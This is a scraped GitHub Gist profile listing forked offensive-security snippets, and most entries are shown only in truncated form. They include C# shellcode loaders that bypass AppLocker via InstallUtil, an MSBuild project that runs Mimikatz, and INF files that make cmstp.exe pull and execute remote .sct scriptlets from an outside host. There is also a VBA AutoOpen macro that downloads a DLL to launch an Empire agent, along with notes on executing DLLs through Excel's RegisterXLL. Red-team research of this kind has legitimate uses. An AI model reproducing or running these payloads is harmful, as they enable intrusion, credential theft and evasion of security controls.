Skip to content

Instantly share code, notes, and snippets.

View gattacker's full-sized avatar
:shipit:
hac

gattacker

:shipit:
hac
26 followers · 334 following
View GitHub Profile
@gattacker
gattacker / Shellcode.cs
Created April 22, 2018 17:39 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@gattacker
gattacker / InstallUtil-Shellcode-cs
Created April 28, 2018 19:36 — forked from lithackr/InstallUtil-Shellcode-cs
From https://gist.github.com/subTee/408d980d88515a539672
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@gattacker
gattacker / PSA64.cs
Created May 6, 2018 10:25 — forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
@gattacker
gattacker / Katz.Proj
Created May 6, 2018 12:57
Mimikatz In MSbuild
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes mimikatz. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@gattacker
gattacker / powersct.inf
Last active May 10, 2018 20:21 — forked from NickTyrer/powersct.sct
Invoke Restricted Powershell via cmstp.exe /s powersct.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
@gattacker
gattacker / ExpandDefenderSig.ps1
Created April 14, 2019 17:35 — forked from mattifestation/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
filter Expand-DefenderAVSignatureDB {
<#
.SYNOPSIS
Decompresses a Windows Defender AV signature database (.VDM file).
.DESCRIPTION
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
@gattacker
gattacker / Empire_via_rundll-powershdll.vba
Created June 10, 2019 12:30 — forked from vivami/Empire_via_rundll-powershdll.vba
VBA macro executing Empire Agent using PowerShdll via rundll
Sub AutoOpen()
Debugging
End Sub
Sub Document_Open()
Debugging
End Sub
Public Function Debugging() As Variant
DownloadDLL
@gattacker
gattacker / ieuinit.inf
Created August 24, 2019 22:12 — forked from bohops/ieuinit.inf
[version]
signature="$CHICAGO$"
AdvancedINF=2.0
[DefaultInstall.Windows7]
UnRegisterOCXs=FunRun
[FunRun]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
@gattacker
gattacker / ExcelXLL.md
Created November 4, 2019 08:21 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@gattacker
gattacker / AV2019.txt
Created November 22, 2019 12:44 — forked from v-p-b/AV2019.txt
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html